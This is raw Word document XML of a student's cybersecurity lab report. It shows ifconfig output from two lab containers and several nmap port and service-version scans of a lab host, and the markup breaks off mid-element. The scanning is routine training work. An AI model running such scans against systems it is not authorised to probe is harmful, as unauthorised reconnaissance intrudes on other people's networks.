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C838" w14:textId="26D35D5F" w:rsidR="00765B3E" w:rsidRDefault="005000ED" w:rsidP="005000ED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 w:rsidRPr="005000ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cyber-Security Report Batch-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B1D10B" w14:textId="21AA218A" w:rsidR="005000ED" w:rsidRDefault="005000ED" w:rsidP="005000ED">
      <w:pPr>
        <w:ind w:left="504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BY:  Mayank Singh Tomar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D55C5D" w14:textId="71AD363A" w:rsidR="005000ED" w:rsidRDefault="005000ED" w:rsidP="005000ED">
      <w:pPr>
        <w:ind w:left="5040"/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Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00A90512">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>tomarm698@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D06356D" w14:textId="77777777" w:rsidR="007B49D7" w:rsidRDefault="007B49D7" w:rsidP="005000ED">
      <w:pPr>
        <w:ind w:left="5040"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5561B04E" w14:textId="373B80E3" w:rsidR="00B94789" w:rsidRPr="007360FF" w:rsidRDefault="006E6AF9" w:rsidP="007B49D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 w14:paraId="0FF692F4" w14:textId="1F4FD9C2" w:rsidR="007B49D7" w:rsidRDefault="007B49D7" w:rsidP="007B49D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460985">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Project-</w:t>
      </w:r>
      <w:r w:rsidR="00B94789">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00460985">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">:      </w:t>
      </w:r>
      <w:r w:rsidRPr="00460985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 xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="007B49D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tools and Libraries  Uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB58F75" w14:textId="5577C710" w:rsidR="00B94789" w:rsidRDefault="00B94789" w:rsidP="00B947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Tools we are going to use in this Project are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF9872E" w14:textId="5F49C2EA" w:rsidR="00B94789" w:rsidRPr="00B94789" w:rsidRDefault="00B94789" w:rsidP="00B947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94789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B27118">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nmap tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51312E" w14:textId="3DDC264E" w:rsidR="00B94789" w:rsidRDefault="00B94789" w:rsidP="00B94789">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94789">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It is the library that comes with Kali it is used to scan IP’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B66690" w14:textId="7B24280E" w:rsidR="00B94789" w:rsidRDefault="00B94789" w:rsidP="00B947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94789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B27118">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploitable2 Vmware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670FDBCC" w14:textId="4FEC1813" w:rsidR="00B27118" w:rsidRDefault="00B27118" w:rsidP="00B27118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94789">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It is the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool used for creating temporary </w:t>
      </w:r>
      <w:r w:rsidRPr="00B94789">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>IP’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> on which we can try various others libraries and tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A31CEC4" w14:textId="77777777" w:rsidR="00B27118" w:rsidRDefault="00B27118" w:rsidP="00B27118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 w14:paraId="2F71E706" w14:textId="770DE0CF" w:rsidR="00B27118" w:rsidRDefault="007360FF" w:rsidP="00B27118">
      <w:pPr>
        <w:jc w:val="both"/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>Tasks</w:t>
      </w:r>
      <w:r w:rsidR="00B27118" w:rsidRPr="00B27118">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and their Reports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524517DC" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="00B27118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4857CD5A" w14:textId="798B1EC7" w:rsidR="004B35E0" w:rsidRPr="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="00B27118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B35E0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="004B35E0">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Login to metaspolit and extract ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F1841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>root@b0da1f362c0b:/# ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45622B7D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>eth0      Link encap:Ethernet  HWaddr 02:42:ac:11:00:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B24E3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inet addr:172.17.0.3  Bcast:172.17.255.255  Mask:255.255.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33076F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UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1078A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RX packets:36 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B0748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TX packets:32 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3404F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collisions:0 txqueuelen:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356C096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RX bytes:3570 (3.4 KB)  TX bytes:3320 (3.2 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72270292" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9A9CAA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>lo        Link encap:Local Loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7908E4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">          inet addr:127.0.0.1  Mask:255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156D238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UP LOOPBACK RUNNING  MTU:65536  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB7B71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RX packets:29 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B9ABC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TX packets:29 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BDB5D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collisions:0 txqueuelen:1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309B5A0D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RX bytes:14421 (14.0 KB)  TX bytes:14421 (14.0 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA6157" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED51E6C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>root@321a9866fd8c:/# ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA93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>eth0      Link encap:Ethernet  HWaddr 02:42:ac:11:00:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C00556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inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E997881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UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0B28C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RX packets:94 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE7BDA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TX packets:84 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A22F9E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collisions:0 txqueuelen:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44097692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RX bytes:13429 (13.1 KB)  TX bytes:12557 (12.2 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A16A564" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D3CBD1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>lo        Link encap:Local Loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053EC647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inet addr:127.0.0.1  Mask:255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544951DB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UP LOOPBACK RUNNING  MTU:65536  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD62404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RX packets:318 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01305EAF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TX packets:318 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD2003" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRP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collisions:0 txqueuelen:1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928C262" w14:textId="5111B5A1" w:rsidR="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B35E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX bytes:156653 (152.9 KB)  TX bytes:156653 (152.9 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71C226" w14:textId="3A31EB6B" w:rsidR="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282149E1" w14:textId="62FB46BA" w:rsidR="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B35E0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="004B35E0">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="36394D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Do nmap scanning on the IP, Extract Open port and Version Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD53FD6" w14:textId="6A830A78" w:rsidR="004B35E0" w:rsidRDefault="004B35E0" w:rsidP="004B35E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B35E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#Commands Runned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601824E7" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C9400" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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└─$ nmap 172.17.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D694ED" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:08 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C022B" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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lastRenderedPageBreak/>
        <w:t>Nmap scan report for 172.17.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BFCB1" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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Host is up (0.019s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A00AB" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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Not shown: 998 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA88F50" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EDF2E" w14:textId="77777777" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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80/tcp  open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40359DF2" w14:textId="79771757" w:rsidR="004B35E0" w:rsidRPr="002167D9" w:rsidRDefault="004B35E0" w:rsidP="004B35E0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443/tcp open  https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CD16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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A9D0F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└─$ nmap -p 80 172.17.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8224A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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:09 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1938428F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Nmap scan report for 172.17.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E1AFA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Host is up (0.0046s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DB70C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</w:p>
    <w:p w14:paraId="29A4131D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PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E0B84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80/tcp open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C8178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</w:p>
    <w:p w14:paraId="68C75E70" w14:textId="5270C4F6" w:rsidR="004B35E0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Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3185A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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89FE6D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└─$ nmap --open 172.17.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF26B3F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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:11 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31092CF3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Nmap scan report for 172.17.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E30AE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Host is up (0.0080s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E6B36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Not shown: 998 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13D4F4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Some closed ports may be reported as filtered due to --defeat-rst-ratelimit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD626A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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D156B2D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80/tcp  open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD821F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443/tcp open  https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635EB3A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</w:p>
    <w:p w14:paraId="4B4102CF" w14:textId="1A13CD38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Nmap done: 1 IP address (1 host up) scanned in 5.90 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B729B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lastRenderedPageBreak/>
        <w:t>┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C87101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└─$ sudo nmap -sS -sV -p21 Ip-Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A40230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Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:35 IST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4C892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Nmap scan report for DESKTOP-5QE9N93.mshome.net (Ip-adress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF80C6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Host is up (0.00038s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BC0FCF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</w:p>
    <w:p w14:paraId="6EB756E8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PORT   STATE    SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DF2E7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21/tcp filtered ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AC3BB3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MAC Address: 00:15:5D:AC:BA:7C (Microsoft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247AE2D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</w:p>
    <w:p w14:paraId="195D67BE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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4A0A2" w14:textId="4FEC44ED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Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D16F8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┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mayank_201b153_kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESKTOP-5QE9N93</w:t>
      </w:r>
      <w:r w:rsidRPr="002167D9">
        <w:rPr>
